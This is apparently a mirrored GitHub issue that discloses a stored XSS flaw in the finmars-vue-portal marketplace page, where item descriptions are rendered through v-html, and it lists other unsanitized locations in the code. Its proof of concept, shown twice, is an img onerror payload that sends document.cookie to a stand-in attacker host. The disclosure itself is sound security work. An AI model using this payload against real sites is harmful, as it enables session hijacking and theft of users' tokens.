starred/finmars-vue-portal
1
0
Fork 0
mirror of https://github.com/finmars-platform/finmars-vue-portal.git synced 2026-04-26 23:05:57 +03:00
Code Issues 4 Projects Releases Packages Wiki Activity

[GH-ISSUE #37] Stored XSS vulnerability in marketplace item descriptions #2

New issue
Open
opened 2026-03-03 12:00:13 +03:00 by kerem · 0 comments
kerem commented 2026-03-03 12:00:13 +03:00
Owner
Copy link

Originally created by @Moltivie on GitHub (Jan 21, 2026).
Original GitHub issue: https://github.com/finmars-platform/finmars-vue-portal/issues/37

Summary

A critical stored XSS vulnerability exists in the marketplace feature that allows attackers to inject malicious JavaScript through marketplace item descriptions, which are rendered unsanitized using v-html.

Vulnerability Details

Location:
github.com/finmars-platform/finmars-vue-portal@496d349f2c/src/pages/marketplace/[id].vue (L36)

Attack Vector

  1. Data Source: Marketplace items are fetched from external API https://marketplace.finmars.com/api/v1/configuration/{id}/
  2. Attacker Access: Anyone with marketplace publisher credentials can inject malicious content
  3. Publishing Method: Configurations are pushed via pushConfigurationToMarketplace.put endpoint with username/password authentication
  4. Execution: Malicious JavaScript executes when any user views the marketplace item

Impact

  • Stored XSS affecting all users who view the compromised marketplace item
  • Session hijacking - Authentication tokens (access_token, refresh_token, id_token) are accessible via JavaScript (cookies lack httpOnly flag)
  • Account takeover - Attacker can perform actions on behalf of victims
  • Data exfiltration - Sensitive user data can be stolen
  • Phishing - Users can be redirected to malicious sites or shown fake login forms

Proof of Concept

An attacker publishes a marketplace configuration with this description:

Great financial tool!<img src=x onerror="fetch('https://attacker.com/steal',{method:'POST',body:document.cookie})">

When victims browse to /marketplace/{id}, the payload executes and sends their authentication tokens to the attacker.

Reproduction Steps

  1. Create marketplace publisher account on marketplace.finmars.com
  2. Push a configuration with malicious HTML in the description field
  3. Navigate to the marketplace item page as a different user
  4. Observe JavaScript execution in browser console

Affected Code Path

marketplace.finmars.com API
  ↓
useApi('marketplaceItem.get') [line 251]
  ↓
item.value (no sanitization)
  ↓
matchItem computed property [line 239]
  ↓
v-html="matchItem.description" [line 36]
  ↓
XSS EXECUTION

Additional Vulnerable Locations

Similar unsanitized v-html usage found in:

  • src/components/modal/DownloadFile.vue:22,30 (CSV file preview)
  • src/components/common/FilePreview.vue:37 (File content preview)
  • src/components/Fm/UnifiedDataSelect/helper.js:8 (Search highlighting)
  • src/stores/useWhiteLabelStore.js:57,61 (Custom CSS injection)

These should be reviewed as part of a comprehensive XSS remediation effort.

Questions

  • Is this behavior intentional? Is there any backend sanitization or validation on the marketplace API that prevents malicious HTML?
  • Are there any access controls or review processes for marketplace publishers that would prevent malicious content?
  • Should HTML formatting be allowed in marketplace descriptions, or should it sanitize/escape all user-provided content?
Originally created by @Moltivie on GitHub (Jan 21, 2026). Original GitHub issue: https://github.com/finmars-platform/finmars-vue-portal/issues/37 ## Summary A **critical stored XSS vulnerability** exists in the marketplace feature that allows attackers to inject malicious JavaScript through marketplace item descriptions, which are rendered unsanitized using `v-html`. ## Vulnerability Details **Location:** https://github.com/finmars-platform/finmars-vue-portal/blob/496d349f2cb3f3b965a90cf4576cf57020d3fc63/src/pages/marketplace/%5Bid%5D.vue#L36 ## Attack Vector 1. **Data Source:** Marketplace items are fetched from external API `https://marketplace.finmars.com/api/v1/configuration/{id}/` 2. **Attacker Access:** Anyone with marketplace publisher credentials can inject malicious content 3. **Publishing Method:** Configurations are pushed via `pushConfigurationToMarketplace.put` endpoint with username/password authentication 4. **Execution:** Malicious JavaScript executes when any user views the marketplace item ## Impact - **Stored XSS** affecting all users who view the compromised marketplace item - **Session hijacking** - Authentication tokens (`access_token`, `refresh_token`, `id_token`) are accessible via JavaScript (cookies lack `httpOnly` flag) - **Account takeover** - Attacker can perform actions on behalf of victims - **Data exfiltration** - Sensitive user data can be stolen - **Phishing** - Users can be redirected to malicious sites or shown fake login forms ## Proof of Concept An attacker publishes a marketplace configuration with this description: ```html Great financial tool!<img src=x onerror="fetch('https://attacker.com/steal',{method:'POST',body:document.cookie})"> ``` When victims browse to `/marketplace/{id}`, the payload executes and sends their authentication tokens to the attacker. ## Reproduction Steps 1. Create marketplace publisher account on `marketplace.finmars.com` 2. Push a configuration with malicious HTML in the `description` field 3. Navigate to the marketplace item page as a different user 4. Observe JavaScript execution in browser console ## Affected Code Path ``` marketplace.finmars.com API ↓ useApi('marketplaceItem.get') [line 251] ↓ item.value (no sanitization) ↓ matchItem computed property [line 239] ↓ v-html="matchItem.description" [line 36] ↓ XSS EXECUTION ``` ## Additional Vulnerable Locations Similar unsanitized `v-html` usage found in: - `src/components/modal/DownloadFile.vue:22,30` (CSV file preview) - `src/components/common/FilePreview.vue:37` (File content preview) - `src/components/Fm/UnifiedDataSelect/helper.js:8` (Search highlighting) - `src/stores/useWhiteLabelStore.js:57,61` (Custom CSS injection) These should be reviewed as part of a comprehensive XSS remediation effort. ## Questions - Is this behavior intentional? Is there any backend sanitization or validation on the marketplace API that prevents malicious HTML? - Are there any access controls or review processes for marketplace publishers that would prevent malicious content? - Should HTML formatting be allowed in marketplace descriptions, or should it sanitize/escape all user-provided content?
Sign in to join this conversation.
No Branch/Tag specified
Branches Tags
main
182-update-sidenav
PLAT-1971-dont-error-out-entire-row-missing-portfolio-reg
PLAT-1837
PLAT-1686
PLAT-1696
1.17.0-rc
1.17.0-stable
1.17.1-stable
PLAT-1789
1.16.0-rc
1.16.0-stable
PLAT-1776
PLAT-205
fix-favicon
PLAT-1462
1.15.0-rc
1.15.0-stable
1.15.1-stable
1.15.2-stable
1.14.0-rc
1.14.0-stable
PLAT-1466
1.13.1-rc
1.13.1-stable
1.13.0-rc
1.13.0-stable
PLAT-1316
PLAT-1386
PLAT-890
PLAT-1385
PLAT-892
1.12.0-rc
1.12.0-stable
1.12.1-stable
1.12.2-stable
PLAT-1218
PLAT-1315
PLAT-1317
PLAT-1336
PLAT-1319
PLAT-1343
PLAT-891(fix)
UPDATE_UI_LIBRARY
1.11.0-rc
1.11.0-stable
1.11.1-stable
1.11.3-stable
1.11.4-stable
PLAT-889
PLAT-1179
PLAT-1046
PLAT-1147
1.10.0-rc
1.10.0-stable
1.10.1-stable
1.10.2-stable
1.10.3-stable
PLAT-1083
1.9.0-rc
1.9.0-stable
1.9.2-stable
1.9.3-stable
1.9.4-stable
PLAT-1070
PLAT-demo-ui-floating-vue
1.8.0-rc
1.8.0-stable
1.8.2-stable
PLAT-707
PLAT-956
1.7.0-rc
1.7.0-stable
1.6.3-rc
1.6.3-stable
PLAT-459
PLAT-753
1.6.1-rc
1.6.1-stable
PLAT-589
PLAT-519
PLAT-447
PLAT-491
1.6.0-stable
1.6.0-rc
PLAT-492
PLAT-449
1.5.0-rc
1.5.0-stable
PLAT-33
PLAT-150-performance-add-annualized-return
PLAT-475-functional-performance-performance-details-error-not-found
revert-7d6189c1
PLAT-455-performance-error-500-if-portfolio-doesn-t-have-register-record
PLAT-454-performance-bundles-2-portfolio-bundle-isn-t-edited-in-selector-portfolio
PLAT-450-functional-performance-columns-sorted-alphabetically-instead-of-numerically-for-numbers
PLAT-112-performance-bundles-add-bundles-info
PLAT-347-performance-add-common-switcher-monthly-cumulative-for-monthly-return-table-graphs
PLAT-82-visual-performance-report-no-icon-and-date-selector-doesn-t-show-manual-input-date-in-the
PLAT-398-functional-performance-monthly-returns-shows-incorrect-year
PLAT-155-performance-add-columns-sorting
1.4.0-rc
1.4.0-stable
FN-1594
1.3.1-stable
1.3.2-rc
1.3.2-stable
1.3.1-rc
PLAT-376-performance-monthly-returns-shows-only-one-year-one-row
master
1.3.0-rc
1.3.0-stable
develop
FN-2182
FN-2271
1.2.3-rc
1.2.3-stable
1.2.4-stable
main-FN-2097
1.2.2-stable
FN-2236
FN-2097
1.2.2-rc
FN-2005
FN-1696
FN-2219
FN-1999
FN-2254
FN-2099
1.2.1-rc
1.2.0-rc
1.1.6-rc
ExpansionPanel-fix
1.1.5-rc
1.1.4-rc
1.1.3-rc
1.1.2-rc
Angular-Migrate
1.1.0-rc
FN-1465
1.0.5-rc
1.0.4-rc
1.0.3-rc
1.0.2-rc
hotfix/0.3.6
hotfix/0.3.4
hotfix/0.3.3
dashboard
1.22.8-rc
1.23.0-stable
1.24.0-stable
1.22.7-rc
1.22.7-stable
1.22.6-stable
1.22.6-rc
1.22.5-rc
1.22.5-stable
1.22.4-rc
1.22.3-rc
1.22.3-stable
1.22.2-rc
1.22.2-stable
1.22.1-stable
1.22.1-rc
1.22.0-stable
1.21.12-stable
1.21.12-rc
1.21.11-stable
1.21.11-rc
1.21.10-stable
1.21.10-rc
1.21.9-rc
1.21.9-stable
1.21.8-rc
1.21.8-stable
1.21.7-stable
1.21.7-rc
1.21.6-rc
1.21.4-stable
1.21.4-rc
1.21.5-rc
1.21.3-stable
1.21.3-rc
1.21.2-rc
1.21.2-stable
1.21.1-rc
1.20.7-rc
1.21.0-stable
1.20.6-rc
1.20.5-rc
1.20.4-rc
1.20.3-rc
1.20.2-rc
1.20.1-rc
1.20.1-stable
1.19.4-rc
1.20.0-stable
1.19.3-rc
1.19.2-rc
1.19.1-rc
1.18.2-rc
1.19.0-stable
1.18.1-rc
1.17.4-stable
1.18.0-stable
1.17.4-rc
1.17.3-rc
1.17.2-rc
1.17.1-rc
1.17.0
1.7.0
1.6.1
1.5.0
1.4.0
1.3.2
1.3.0
1.2.2
1.2.1
1.1.4
1.1.3
1.1.2
1.1.0
1.0.5
1.0.6
1.0.7
1.0.4
1.0.3
1.0.1
1.0.0
0.5.0
0.5.1
0.4.3
0.4.1
0.4.0
0.4.2
0.2.2.0
0.2.1.0
Labels
Clear labels   
pull-request

Mirrored from GitHub Pull Request

No labels
pull-request
Milestone
Clear milestone
No items
No milestone
Projects
Clear projects
No items
No project
Assignees
Clear assignees
No assignees
1 participant
Notifications
Due date
The due date is invalid or out of range. Please use the format "yyyy-mm-dd".

No due date set.

Dependencies

No dependencies set.

Reference
starred/finmars-vue-portal#2
No description provided.